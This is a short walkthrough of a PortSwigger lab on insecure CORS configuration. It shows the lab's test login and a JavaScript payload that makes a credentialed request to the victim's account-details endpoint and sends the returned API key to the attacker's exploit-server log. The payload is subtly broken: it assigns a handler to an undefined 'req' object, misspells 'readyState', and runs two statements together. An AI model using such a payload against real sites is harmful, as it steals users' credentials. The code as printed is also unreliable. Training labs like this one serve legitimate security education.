Portswigger’s Cross-Origin Resource Sharing Lab Simple Solution | Karthikeyan Nagaraj
Lab Description:
- This website has an insecure CORS configuration in that it trusts all origins.
- To solve the lab, craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server.
- The lab is solved when you successfully submit the administrator’s API key.
- You can log in to your own account using the following credentials:
wiener:peter
Analysis:
- Turn your proxy On and Turn Off your Intercept Off
- Now Login with the Credentials
wiener:peter - Now on the Proxy tab click on HTTP History and Look at the
/accountDetailsrequest
4. Observe that your key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials header suggesting that it may support CORS.
5. Now, go to the exploit server and type the Following payload with your LAB-ID
<script>
var xhr= new XMLHttpRequest();
var url = "https://YOUR_LAB_ID.web-security-academy.net"req.onreadystatechange = function() {
if (xhr.readystate == XMLHttpRequest.DONE){
fetch("/log?key=" + xhr.responseText)
}
}
xhr.open('GET', url + "/accountDetails", true);
xhr.withCredentials = true;
xhr.send(null)
</script>
6. View and Deliver Exploit to the Victim
7. Now you will get the API key of the Victim, Submit the key in the solution to solve the Lab
